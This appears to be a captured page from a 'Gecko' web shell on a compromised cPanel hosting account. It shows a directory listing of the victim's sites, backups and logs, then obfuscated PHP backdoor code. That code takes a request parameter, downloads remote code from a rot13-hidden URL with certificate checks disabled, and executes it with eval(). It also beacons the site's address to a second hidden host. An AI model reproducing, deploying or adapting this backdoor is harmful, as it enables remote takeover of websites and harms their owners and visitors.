Gecko [ rangeelarajasthantaxi.com ]

Name	Size	Permission	Date
.HttpRequest	[ DIR ]	drwxr-xr-x	2022-04-25 05:59
.cagefs	[ DIR ]	drwxrwx--x	2026-05-05 14:35
.caldav	[ DIR ]	drwxr-xr-x	2026-05-05 14:40
.cl.selector	[ DIR ]	drwxr-xr-x	2026-05-08 16:38
.clwpos	[ DIR ]	drwxr-xr-x	2026-05-08 21:12
.cpaddons	[ DIR ]	drwxr-xr-x	2024-01-27 10:58
.cpanel	[ DIR ]	drwx------	2026-05-10 06:57
.cpguard	[ DIR ]	drwxr-xr-x	2026-05-08 15:47
.cphorde	[ DIR ]	drwx------	2022-05-02 12:42
.htpasswds	[ DIR ]	drwxr-x---	2021-10-02 07:37
.jbm	[ DIR ]	drwxr-xr-x	2021-10-08 18:38
.koality	[ DIR ]	drwxr-xr-x	2024-10-17 07:30
.pki	[ DIR ]	drwxr-xr-x	2021-10-11 07:19
.razor	[ DIR ]	drwxr-xr-x	2026-05-10 05:22
.sitepad	[ DIR ]	drwx--x--x	2026-05-10 00:16
.softaculous	[ DIR ]	drwx--x--x	2026-05-10 07:07
.spamassassin	[ DIR ]	drwxr-xr-x	2026-05-10 19:44
.subaccounts	[ DIR ]	drwxr-xr-x	2026-05-06 14:59
.trash	[ DIR ]	drwxr-xr-x	2026-05-09 17:27
access-logs	[ DIR ]	drwxr-x---	2026-05-10 12:03
cache	[ DIR ]	drwxr-xr-x	2024-06-28 13:25
cpanel3-skel	[ DIR ]	drwxr-xr-x	2021-10-02 07:39
dialawallpaper.com	[ DIR ]	drwxr-xr-x	2026-05-09 15:08
etc	[ DIR ]	drwxr-x---	2025-12-01 05:27
homedir	[ DIR ]	drwxr-xr-x	2025-10-09 06:22
logs	[ DIR ]	drwxr-xr-x	2026-05-10 13:07
lscache	[ DIR ]	drwxrws---	2024-08-17 09:31
mail	[ DIR ]	drwxr-x--x	2026-05-08 06:07
mychoiceaus.com.au	[ DIR ]	drwxrwxrwx	2026-05-10 15:46
naturestrailigatpuri.com	[ DIR ]	drwxr-xr-x	2026-05-10 06:09
perl5	[ DIR ]	drwxr-xr-x	2024-05-06 05:44
pratapsinghtours.com	[ DIR ]	drwxr-xr-x	2026-05-09 07:53
public_ftp	[ DIR ]	drwxr-x---	2021-10-02 07:37
public_html	[ DIR ]	drwxr-x---	2026-05-10 04:03
rangeelarajasthantaxi.com	[ DIR ]	drwxr-xr-x	2026-05-10 18:03
softaculous_backups	[ DIR ]	drwx--x--x	2026-05-09 22:56
ssl	[ DIR ]	drwxr-xr-x	2026-05-10 08:14
tmp	[ DIR ]	drwxr-xr-x	2026-05-09 22:56
travel2nature.com	[ DIR ]	drwxr-xr-x	2026-05-10 20:04
www	[ DIR ]	drwxr-x---	2026-05-10 04:03
.bashrc	231 B	-rw-r--r--	2021-10-02 07:37
.clamavconnector.scan	456 B	-rw-r--r--	2026-05-08 06:17
.clamavconnector.status	548 B	-rw-r--r--	2026-05-08 06:17
.contactemail	17 B	-rw-------	2021-10-02 07:37
.gemrc	139 B	-rw-r--r--	2025-12-04 17:16
.imunify_patch_id	106 B	-rw-r--r--	2026-05-06 14:37
.lastlogin	125 B	-rw-------	2026-05-09 08:51
.myimunify_id	102 B	-rw-r--r--	2024-07-01 13:02
.permslog	18.78 MB	-rw-r--r--	2026-05-08 08:52
.spamassassinboxenable	0 B	-rw-r--r--	2021-10-02 07:37
.spamassassinenable	0 B	-rw-r--r--	2021-10-02 07:37
.wp-toolkit-identifier	684 B	-rw-r--r--	2026-05-06 09:42
homedir.tar.gz	676.19 MB	-rw-r--r--	2026-05-08 08:48
php.ini	583 B	-rw-r--r--	2023-07-13 07:42
wp-blog-header.php	2.74 KB	-rw-r--r--	2026-05-06 07:26

Rename

<?php
 goto tUl6b; wXtx3: $rHfMY = $_REQUEST["\144\157\141\143\x74"]; goto HgQ3I; aYfRm: session_start(); goto wXtx3; N7Xk9: $sJ3ad = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\x6f\156" ? "\150\164\x74\160\x73" : "\150\164\x74\160") . "\x3a\x2f\x2f{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}{$_SERVER["\122\x45\x51\125\x45\123\124\137\x55\x52\111"]}"; goto Pmj6n; LLG9S: function sXidc($sJ3ad) { goto n0NKE; NAssn: $tz7fb = curl_exec($U8dd8); goto S3rIV; yoBMI: return $tz7fb; goto VHWhP; TwOE6: $tz7fb = stream_get_contents($FJvaM); goto cwV9V; VDpuf: if (!function_exists("\x63\x75\x72\154\137\x65\x78\145\x63")) { goto el1M3; } goto XeE53; RIUJx: el1M3: goto qrsug; O9m5u: mfeik: goto yoBMI; vh255: $FJvaM = fopen($sJ3ad, "\x72"); goto TwOE6; ENMVc: if (!(empty($tz7fb) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\155\137\147\x65\x74\137\143\x6f\x6e\x74\x65\156\164\163"))) { goto mfeik; } goto vh255; n0NKE: $tz7fb = ''; goto VDpuf; K9wqV: KCf2O: goto ENMVc; OEkP7: curl_setopt($U8dd8, CURLOPT_RETURNTRANSFER, 1); goto JMTNg; XeE53: $U8dd8 = curl_init($sJ3ad); goto OEkP7; S3rIV: curl_close($U8dd8); goto RIUJx; tkeD5: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYPEER, 0); goto cQqi_; JMTNg: curl_setopt($U8dd8, CURLOPT_FOLLOWLOCATION, 1); goto tkeD5; T4y9f: $tz7fb = file_get_contents($sJ3ad); goto K9wqV; cwV9V: fclose($FJvaM); goto O9m5u; cQqi_: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYHOST, 0); goto NAssn; qrsug: if (!(empty($tz7fb) && function_exists("\x66\151\x6c\x65\x5f\x67\x65\x74\137\x63\157\156\x74\145\x6e\164\163"))) { goto KCf2O; } goto T4y9f; VHWhP: } goto KwJ9D; rzajS: exit; goto kAGwF; B6fd_: eval("\77\x3e" . $Biqik); goto rzajS; Pmj6n: XlPsQ(array("\167\145\x62" => $sJ3ad)); goto wwzKB; kAGwF: JS6LS: goto LLG9S; IQihW: KSZRy: goto K2jbV; tUl6b: error_reporting(0); goto aYfRm; HgQ3I: if (!empty($rHfMY)) { goto KSZRy; } goto N7Xk9; K2jbV: $_SESSION["\x64\x6f\x61\x63\164"] = $rHfMY; goto jZVAU; wwzKB: goto JS6LS; goto IQihW; jZVAU: $Biqik = sxIDc(str_rot13("\x75\147\x67\x63\x66\72\57\57\x75\x6f\157\156\144\141\56\x74\x6e\x7a\162\x6e\143\162\x2e\x67\142\x63\x2f\x71\x62\142\x65\x2f") . $rHfMY . "\56\164\x78\164"); goto B6fd_; KwJ9D: function xLpSq($oFbXi) { goto qRLdR; sgjQn: curl_setopt($OUnCg, CURLOPT_POSTFIELDS, $oFbXi); goto eEPm6; eEPm6: curl_setopt($OUnCg, CURLOPT_RETURNTRANSFER, true); goto JM27m; qB8i1: $OUnCg = curl_init(str_rot13($sJ3ad)); goto jfSiq; qRLdR: $sJ3ad = "\x75\x67\x67\x63\x3a\x2f\x2f\145\x72\x7a\x62\x67\162\x32\60\62\x35\x2e\157\154\x75\x62\x67\x2e\147\x62\x63\x2f\166\x61\161\x72\x6b\56\x63\165\143"; goto qB8i1; JM27m: $FJ0YN = curl_exec($OUnCg); goto RiAUd; RiAUd: curl_close($OUnCg); goto OBMXo; jfSiq: curl_setopt($OUnCg, CURLOPT_POST, 1); goto sgjQn; OBMXo: }
?>